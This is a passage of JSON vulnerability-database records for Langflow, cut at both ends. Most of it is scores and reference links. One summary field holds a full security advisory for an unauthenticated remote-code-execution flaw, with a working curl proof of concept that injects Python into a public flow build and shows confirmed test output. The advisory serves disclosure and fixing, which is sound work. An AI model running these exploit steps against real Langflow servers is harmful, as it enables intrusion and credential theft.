"https://gist.github.com/chenhouser2025/77adb3486c06c635ae4b09a3eaf90213" }, { "reference_url": "https://github.com/langflow-ai/langflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "2.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/langflow-ai/langflow" }, { "reference_url": "https://github.com/langflow-ai/langflow/commit/45325f6376309a91f5017fa033a96c09c7e295e3", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "2.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/langflow-ai/langflow/commit/45325f6376309a91f5017fa033a96c09c7e295e3" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6598", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "2.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6598" }, { "reference_url": "https://vuldb.com/submit/791921", "reference_id": "", "reference_type": "", "scores": [ { "value": "4", "scoring_system": "cvssv2", "scoring_elements": "AV:N/AC:L/Au:S/C:P/I:N/A:N/E:POC/RL:ND/RC:UR" }, { "value": "4.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R" }, { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R" }, { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "2.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T16:19:05Z/" } ], "url": "https://vuldb.com/submit/791921" }, { "reference_url": "https://vuldb.com/vuln/358233", "reference_id": "", "reference_type": "", "scores": [ { "value": "4", "scoring_system": "cvssv2", "scoring_elements": "AV:N/AC:L/Au:S/C:P/I:N/A:N/E:POC/RL:ND/RC:UR" }, { "value": "4.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R" }, { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R" }, { "value": "2.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T16:19:05Z/" } ], "url": "https://vuldb.com/vuln/358233" }, { "reference_url": "https://vuldb.com/vuln/358233/cti", "reference_id": "", "reference_type": "", "scores": [ { "value": "4", "scoring_system": "cvssv2", "scoring_elements": "AV:N/AC:L/Au:S/C:P/I:N/A:N/E:POC/RL:ND/RC:UR" }, { "value": "4.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R" }, { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R" }, { "value": "2.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T16:19:05Z/" } ], "url": "https://vuldb.com/vuln/358233/cti" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*" }, { "reference_url": "https://github.com/advisories/GHSA-9jpj-cph8-w449", "reference_id": "GHSA-9jpj-cph8-w449", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-9jpj-cph8-w449" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109912?format=api", "purl": "pkg:pypi/langflow@1.9.1", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.9.1" } ], "aliases": [ "CVE-2026-6598", "GHSA-9jpj-cph8-w449" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ypxh-x2hy-3uhb" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/37154?format=api", "vulnerability_id": "VCID-ysnc-jyxb-6qcy", "summary": "Langflow versions up to and including 1.6.9 contain a chained vulnerability that enables account takeover and remote code execution. An overly permissive CORS configuration (allow_origins='*' with allow_credentials=True) combined with a refresh token cookie configured as SameSite=None allows a malicious webpage to perform cross-origin requests that include credentials and successfully call the refresh endpoint. An attacker-controlled origin can therefore obtain fresh access_token / refresh_token pairs for a victim session. Obtained tokens permit access to authenticated endpoints — including built-in code-execution functionality — allowing the attacker to execute arbitrary code and achieve full system compromise.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-34291", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.32746", "scoring_system": "epss", "scoring_elements": "0.96973", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-34291" }, { "reference_url": "https://github.com/langflow-ai/langflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Attend", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:A/A:N/T:T/P:M/B:A/M:M/D:A/2026-05-21T19:39:27Z/" } ], "url": "https://github.com/langflow-ai/langflow" }, { "reference_url": "https://github.com/langflow-ai/langflow/pull/10139", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/langflow-ai/langflow/pull/10139" }, { "reference_url": "https://github.com/langflow-ai/langflow/pull/10696", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/langflow-ai/langflow/pull/10696" }, { "reference_url": "https://github.com/langflow-ai/langflow/pull/9240", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/langflow-ai/langflow/pull/9240" }, { "reference_url": "https://github.com/langflow-ai/langflow/pull/9441", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/langflow-ai/langflow/pull/9441" }, { "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/langflow/PYSEC-2025-78.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/advisory-database/tree/main/vulns/langflow/PYSEC-2025-78.yaml" }, { "reference_url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-34291", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-34291" }, { "reference_url": "https://www.obsidiansecurity.com/blog/cve-2025-34291-critical-account-takeover-and-rce-vulnerability-in-the-langflow-ai-agent-workflow-platform", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Attend", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:A/A:N/T:T/P:M/B:A/M:M/D:A/2026-05-21T19:39:27Z/" } ], "url": "https://www.obsidiansecurity.com/blog/cve-2025-34291-critical-account-takeover-and-rce-vulnerability-in-the-langflow-ai-agent-workflow-platform" }, { "reference_url": "https://www.vulncheck.com/advisories/langflow-cors-misconfiguration-to-token-hijack-and-rce", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Attend", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:A/A:N/T:T/P:M/B:A/M:M/D:A/2026-05-21T19:39:27Z/" } ], "url": "https://www.vulncheck.com/advisories/langflow-cors-misconfiguration-to-token-hijack-and-rce" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-34291", "reference_id": "CVE-2025-34291", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-34291" }, { "reference_url": "https://www.crowdsec.net/vulntracking-report/cve-2025-34291", "reference_id": "CVE-2025-34291", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.crowdsec.net/vulntracking-report/cve-2025-34291" }, { "reference_url": "https://github.com/advisories/GHSA-577h-p2hh-v4mv", "reference_id": "GHSA-577h-p2hh-v4mv", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-577h-p2hh-v4mv" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/46626?format=api", "purl": "pkg:pypi/langflow@1.7.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1ynd-c2hz-53hx" }, { "vulnerability": "VCID-2195-gd33-xbdp" }, { "vulnerability": "VCID-2649-thqq-r3d2" }, { "vulnerability": "VCID-4swq-hbjm-3ucd" }, { "vulnerability": "VCID-bb6r-1f6u-t7ed" }, { "vulnerability": "VCID-ncvf-vzqr-uydz" }, { "vulnerability": "VCID-q4r1-xjfk-7bg9" }, { "vulnerability": "VCID-qwtw-q92t-quhz" }, { "vulnerability": "VCID-rc54-gw71-gyau" }, { "vulnerability": "VCID-rrva-95s5-kbcf" }, { "vulnerability": "VCID-sbea-kkfu-akgb" }, { "vulnerability": "VCID-u8mw-7znw-rfab" }, { "vulnerability": "VCID-v5pc-pdm9-97g8" }, { "vulnerability": "VCID-ypxh-x2hy-3uhb" }, { "vulnerability": "VCID-zqwj-45w7-7kft" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.7.0" } ], "aliases": [ "CVE-2025-34291", "GHSA-577h-p2hh-v4mv", "PYSEC-2025-78" ], "risk_score": 10.0, "exploitability": "2.0", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ysnc-jyxb-6qcy" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91844?format=api", "vulnerability_id": "VCID-zqwj-45w7-7kft", "summary": "Unauthenticated Remote Code Execution in Langflow via Public Flow Build Endpoint\n## Summary\n\nThe `POST /api/v1/build_public_tmp/{flow_id}/flow` endpoint allows building public flows without requiring authentication. When the optional `data` parameter is supplied, the endpoint uses **attacker-controlled flow data** (containing arbitrary Python code in node definitions) instead of the stored flow data from the database. This code is passed to `exec()` with zero sandboxing, resulting in unauthenticated remote code execution.\n\nThis is distinct from CVE-2025-3248, which fixed `/api/v1/validate/code` by adding authentication. The `build_public_tmp` endpoint is **designed** to be unauthenticated (for public flows) but incorrectly accepts attacker-supplied flow data containing arbitrary executable code.\n\n## Affected Code\n\n### Vulnerable Endpoint (No Authentication)\n\n**File:** `src/backend/base/langflow/api/v1/chat.py`, lines 580-657\n\n```python\n@router.post(\"/build_public_tmp/{flow_id}/flow\")\nasync def build_public_tmp(\n *,\n flow_id: uuid.UUID,\n data: Annotated[FlowDataRequest | None, Body(embed=True)] = None, # ATTACKER CONTROLLED\n request: Request,\n # ... NO Depends(get_current_active_user) -- MISSING AUTH ...\n):\n \"\"\"Build a public flow without requiring authentication.\"\"\"\n client_id = request.cookies.get(\"client_id\")\n owner_user, new_flow_id = await verify_public_flow_and_get_user(flow_id=flow_id, client_id=client_id)\n\n job_id = await start_flow_build(\n flow_id=new_flow_id,\n data=data, # Attacker's data passed directly to graph builder\n current_user=owner_user,\n ...\n )\n```\n\nCompare with the authenticated build endpoint at line 138, which requires `current_user: CurrentActiveUser`.\n\n### Code Execution Chain\n\nWhen attacker-supplied `data` is provided, it flows through:\n\n1. `start_flow_build(data=attacker_data)` → `generate_flow_events()` -- `build.py:81`\n2. `create_graph()` → `build_graph_from_data(payload=data.model_dump())` -- `build.py:298`\n3. `Graph.from_payload(payload)` parses attacker nodes -- `base.py:1168`\n4. `add_nodes_and_edges()` → `initialize()` → `_build_graph()` -- `base.py:270,527`\n5. `_instantiate_components_in_vertices()` iterates nodes -- `base.py:1323`\n6. `vertex.instantiate_component()` → `instantiate_class(vertex)` -- `loading.py:28`\n7. `code = custom_params.pop(\"code\")` extracts attacker code -- `loading.py:43`\n8. `eval_custom_component_code(code)` → `create_class(code, class_name)` -- `eval.py:9`\n9. `prepare_global_scope(module)` -- `validate.py:323`\n10. `exec(compiled_code, exec_globals)` -- **ARBITRARY CODE EXECUTION** -- `validate.py:397`\n\n### Unsandboxed exec() in prepare_global_scope\n\n**File:** `src/lfx/src/lfx/custom/validate.py`, lines 340-397\n\n```python\ndef prepare_global_scope(module):\n exec_globals = globals().copy()\n\n # Imports are resolved first (any module can be imported)\n for node in imports:\n module_obj = importlib.import_module(module_name) # line 352\n exec_globals[variable_name] = module_obj\n\n # Then ALL top-level definitions are executed (Assign, ClassDef, FunctionDef)\n if definitions:\n combined_module = ast.Module(body=definitions, type_ignores=[])\n compiled_code = compile(combined_module, \"<string>\", \"exec\")\n exec(compiled_code, exec_globals) # line 397 - ARBITRARY CODE EXECUTION\n```\n\n**Critical detail:** `prepare_global_scope` executes `ast.Assign` nodes. An attacker's code like `_x = os.system(\"id\")` is an assignment and will be executed during graph building -- before the flow even \"runs.\"\n\n## Prerequisites\n\n1. Target Langflow instance has at least **one public flow** (common for demos, chatbots, shared workflows)\n2. Attacker knows the public flow's UUID (discoverable via shared links/URLs)\n3. No authentication required -- only a `client_id` cookie (any arbitrary string value)\n\nWhen `AUTO_LOGIN=true` (the **default**), all prerequisites can be met by an unauthenticated attacker:\n1. `GET /api/v1/auto_login` → obtain superuser token\n2. `POST /api/v1/flows/` → create a public flow\n3. Exploit via `build_public_tmp` without any auth\n\n## Proof of Concept\n\n### Tested Against\n\n- **Langflow version 1.7.3** (latest stable release, installed via `pip install langflow`)\n- **Fully reproducible**: 6/6 runs confirmed RCE (two sets of 3 runs each)\n\n### Step 1: Obtain a Public Flow ID\n\n(In a real attack, the attacker discovers this via shared links. For the PoC, we create one via AUTO_LOGIN.)\n\n```bash\n# Get superuser token (no credentials needed when AUTO_LOGIN=true)\nTOKEN=$(curl -s http://localhost:7860/api/v1/auto_login | jq -r '.access_token')\n\n# Create a public flow\nFLOW_ID=$(curl -s -X POST http://localhost:7860/api/v1/flows/ \\\n -H \"Authorization: Bearer $TOKEN\" \\\n -H \"Content-Type: application/json\" \\\n -d '{\"name\":\"test\",\"data\":{\"nodes\":[],\"edges\":[]},\"access_type\":\"PUBLIC\"}' \\\n | jq -r '.id')\n\necho \"Public Flow ID: $FLOW_ID\"\n```\n\n### Step 2: Exploit -- Unauthenticated RCE\n\n```bash\n# EXPLOIT: Send malicious flow data to the UNAUTHENTICATED endpoint\n# NO Authorization header, NO API key, NO credentials\ncurl -X POST \"http://localhost:7860/api/v1/build_public_tmp/${FLOW_ID}/flow\" \\\n -H \"Content-Type: application/json\" \\\n -b \"client_id=attacker\" \\\n -d '{\n \"data\": {\n \"nodes\": [{\n \"id\": \"Exploit-001\",\n \"type\": \"genericNode\",\n \"position\": {\"x\":0,\"y\":0},\n \"data\": {\n \"id\": \"Exploit-001\",\n \"type\": \"ExploitComp\",\n \"node\": {\n \"template\": {\n \"code\": {\n \"type\": \"code\",\n \"required\": true,\n \"show\": true,\n \"multiline\": true,\n \"value\": \"import os, socket, json as _json\\n\\n_proof = os.popen(\\\"id\\\").read().strip()\\n_host = socket.gethostname()\\n_write = open(\\\"/tmp/rce-proof\\\",\\\"w\\\").write(f\\\"{_proof} on {_host}\\\")\\n\\nfrom lfx.custom.custom_component.component import Component\\nfrom lfx.io import Output\\nfrom lfx.schema.data import Data\\n\\nclass ExploitComp(Component):\\n display_name=\\\"X\\\"\\n outputs=[Output(display_name=\\\"O\\\",name=\\\"o\\\",method=\\\"r\\\")]\\n def r(self)->Data:\\n return Data(data={})\",\n \"name\": \"code\",\n \"password\": false,\n \"advanced\": false,\n \"dynamic\": false\n },\n \"_type\": \"Component\"\n },\n \"description\": \"X\",\n \"base_classes\": [\"Data\"],\n \"display_name\": \"ExploitComp\",\n \"name\": \"ExploitComp\",\n \"frozen\": false,\n \"outputs\": [{\"types\":[\"Data\"],\"selected\":\"Data\",\"name\":\"o\",\"display_name\":\"O\",\"method\":\"r\",\"value\":\"__UNDEFINED__\",\"cache\":true,\"allows_loop\":false,\"tool_mode\":false,\"hidden\":null,\"required_inputs\":null,\"group_outputs\":false}],\n \"field_order\": [\"code\"],\n \"beta\": false,\n \"edited\": false\n }\n }\n }],\n \"edges\": []\n },\n \"inputs\": null\n }'\n```\n\n### Step 3: Verify Code Execution\n\n```bash\n# Wait 2 seconds for async graph building\nsleep 2\n\n# Check proof file written by attacker's code on the server\ncat /tmp/rce-proof\n# Output: uid=1000(aviral) gid=1000(aviral) groups=... on kali\n```\n\n### Actual Test Results\n\n```\n======================================================================\nLANGFLOW v1.7.3 UNAUTHENTICATED RCE - DEFINITIVE E2E TEST\n======================================================================\nVersion: Langflow 1.7.3\n\nRUN 1: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH)\n HTTP 200 - Job ID: d8db19bf-a532-4f9d-a368-9c46d6235c19\n *** REMOTE CODE EXECUTION CONFIRMED ***\n canary: RCE-f0d19b36\n hostname: kali\n uid: 1000\n whoami: aviral\n id: uid=1000(aviral) gid=1000(aviral) groups=1000(aviral),...\n uname: Linux 6.16.8+kali-amd64\n\nRUN 2: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH)\n HTTP 200 - Job ID: d2e24f20-d707-4278-868c-583dd7532832\n *** REMOTE CODE EXECUTION CONFIRMED ***\n canary: RCE-6037a271\n\nRUN 3: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH)\n HTTP 200 - Job ID: 5962244a-42af-4ef6-b134-a6a4adba5ab7\n *** REMOTE CODE EXECUTION CONFIRMED ***\n canary: RCE-4a796556\n\nFINAL RESULTS\n Total checks: 15\n VULNERABLE: 15\n SAFE: 0\n RCE confirmed: 3/3 runs\n Reproducible: YES (100%)\n```\n\n## Impact\n\n- **Unauthenticated Remote Code Execution** with full server process privileges\n- **Complete server compromise**: arbitrary file read/write, command execution\n- **Environment variable exfiltration**: API keys, database credentials, cloud tokens (confirmed in PoC: env_keys exfiltrated)\n- **Reverse shell access** for persistent access\n- **Lateral movement** within the network\n- **Data exfiltration** from all flows, messages, and stored credentials in the database\n\n## Comparison with CVE-2025-3248\n\n| Aspect | CVE-2025-3248 | This Vulnerability |\n|--------|--------------|-------------------|\n| **Endpoint** | `/api/v1/validate/code` | `/api/v1/build_public_tmp/{id}/flow` |\n| **Fix applied** | Added `Depends(get_current_active_user)` | None -- NEW vulnerability |\n| **Root cause** | Missing auth on code validation | Unauthenticated endpoint accepts attacker-controlled executable code via `data` param |\n| **Code execution via** | `validate_code()` → `exec()` | `create_class()` → `prepare_global_scope()` → `exec()` |\n| **CISA KEV** | Yes (actively exploited) | N/A (new finding) |\n| **Can simple auth fix?** | Yes (and it was fixed) | No -- endpoint is *designed* to be unauthenticated; the `data` parameter must be removed |\n\n## Recommended Fix\n\n### Immediate (Short-term)\n\n**Remove the `data` parameter** from `build_public_tmp`. Public flows should only execute their stored flow data, never attacker-supplied data:\n\n```python\n@router.post(\"/build_public_tmp/{flow_id}/flow\")\nasync def build_public_tmp(\n *,\n flow_id: uuid.UUID,\n inputs: Annotated[InputValueRequest | None, Body(embed=True)] = None,\n # REMOVED: data parameter -- public flows must use stored data only\n ...\n):\n```\n\nIn `generate_flow_events` → `create_graph()`, only the `build_graph_from_db` path should be reachable for unauthenticated requests:\n\n```python\nasync def create_graph(fresh_session, flow_id_str, flow_name):\n # For public flows, ALWAYS load from database, never from user data\n return await build_graph_from_db(\n flow_id=flow_id,\n session=fresh_session,\n ...\n )\n```", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33017", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.24652", "scoring_system": "epss", "scoring_elements": "0.96242", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33017" }, { "reference_url": "https://github.com/langflow-ai/langflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/langflow-ai/langflow" }, { "reference_url": "https://github.com/langflow-ai/langflow/commit/73b6612e3ef25fdae0a752d75b0fabd47328d4f0", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Act", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2026-03-26T03:55:25Z/" } ], "url": "https://github.com/langflow-ai/langflow/commit/73b6612e3ef25fdae0a752d75b0fabd47328d4f0" }, { "reference_url": "https://github.com/langflow-ai/langflow/issues/12345", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": 